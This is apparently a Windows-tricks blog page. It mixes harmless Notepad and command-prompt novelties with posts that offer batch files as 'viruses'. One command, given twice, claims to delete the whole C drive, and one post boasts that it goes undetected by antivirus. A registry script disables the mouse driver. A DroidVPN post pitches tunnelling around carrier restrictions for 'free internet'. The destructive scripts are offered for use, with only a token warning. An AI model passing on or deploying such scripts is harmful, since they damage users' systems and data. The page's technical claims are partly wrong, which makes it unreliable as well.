Showing posts with label virus. Show all posts
Showing posts with label virus. Show all posts

Sunday, August 28, 2016

Watch Star Wars Movie In CMD

        
                    This is very intersting and amazing command prompt trick which will play star wars movie in the command prompt or cmd. Below are complete steps with screen shots for this trick with. Without wasting time lets gets started.


       1. Go to start > Run and type in cmd and press enter
       2. Now type in telnet as shown below and press enter.


       3. After that enter o as shown below and press enter.


       4. Next enter towel.blinkenlights.nl as shown below and press enter.


       5. Now star wars movie will start playing on your command prompt.

Share:

Top 5 Cool Notepad Tricks

notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch fileprograms. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.
Share:

How To Use DroidVPN For Free Internet ( Complete Guide )

How To Use DroidVPN

Today we’re going to show you the Complete Guide for How To Use DroidVPN For Free Internet. DroidVPN is an easy to use VPN software for android devices which can be used for using Free Internet in any of the India Telecom Operator. With the help of Droid VPN you can surf the internet anonymously by tunneling all your internet traffic from your android device to our servers. You can also browse the internet even if you are only allowed to send ping requests and internet browsing is blocked on your Windows firewall.


How To Use DroidVPN For Free Internet

Follow the steps given below to Enjoy Free Internet. 

Firstly, Download and Install Droid VPN in your Android Mobile. You can download it by clicking here. If you already have Droid VPN installed in your Android Mobile skip this steps.
You can also install it by using Google Play Store. Search directly on the play store for DroidVPN and install
After that, sign up for free Droid VPN account. You can sign up it by clicking here. You can also signup by Opening Droid VPN in your Android Mobile and click on Register a new account.
Now you have login details, the next step it to login. Open Droid VPN in your Android Mobile and go to setting, it can be found at Right Top Corner .
Now from settings, tap on Configure Your Account
From there fill your login details, that is, your email and your password.

DroidVPN Login

After fill your login details, that is, your email and your password, click on save my login details.
Now you are ready to connect to the Droid VPN Server.
Whenever you need to use Free Internet you can go to Settings > Connection Settings.


I hope this post for How To Use DroidVPN For Free Internet works for you as well. These different tricks are works in many different states. We constantly publish tricks on Networks. Keep checking our Network category regularly or subscribe our updates. You should try these Free Internet Tricks 2016 and You can bookmark our site or subscribe via Facebook , Twitter , or Subscribe to our mailing list and get interesting stuff and updates to your email inbox.
Share:

Tuesday, September 8, 2015

Create a virus that disable mouse

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.
Share:

Make Dangerous Virus In A Minute

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Share:

as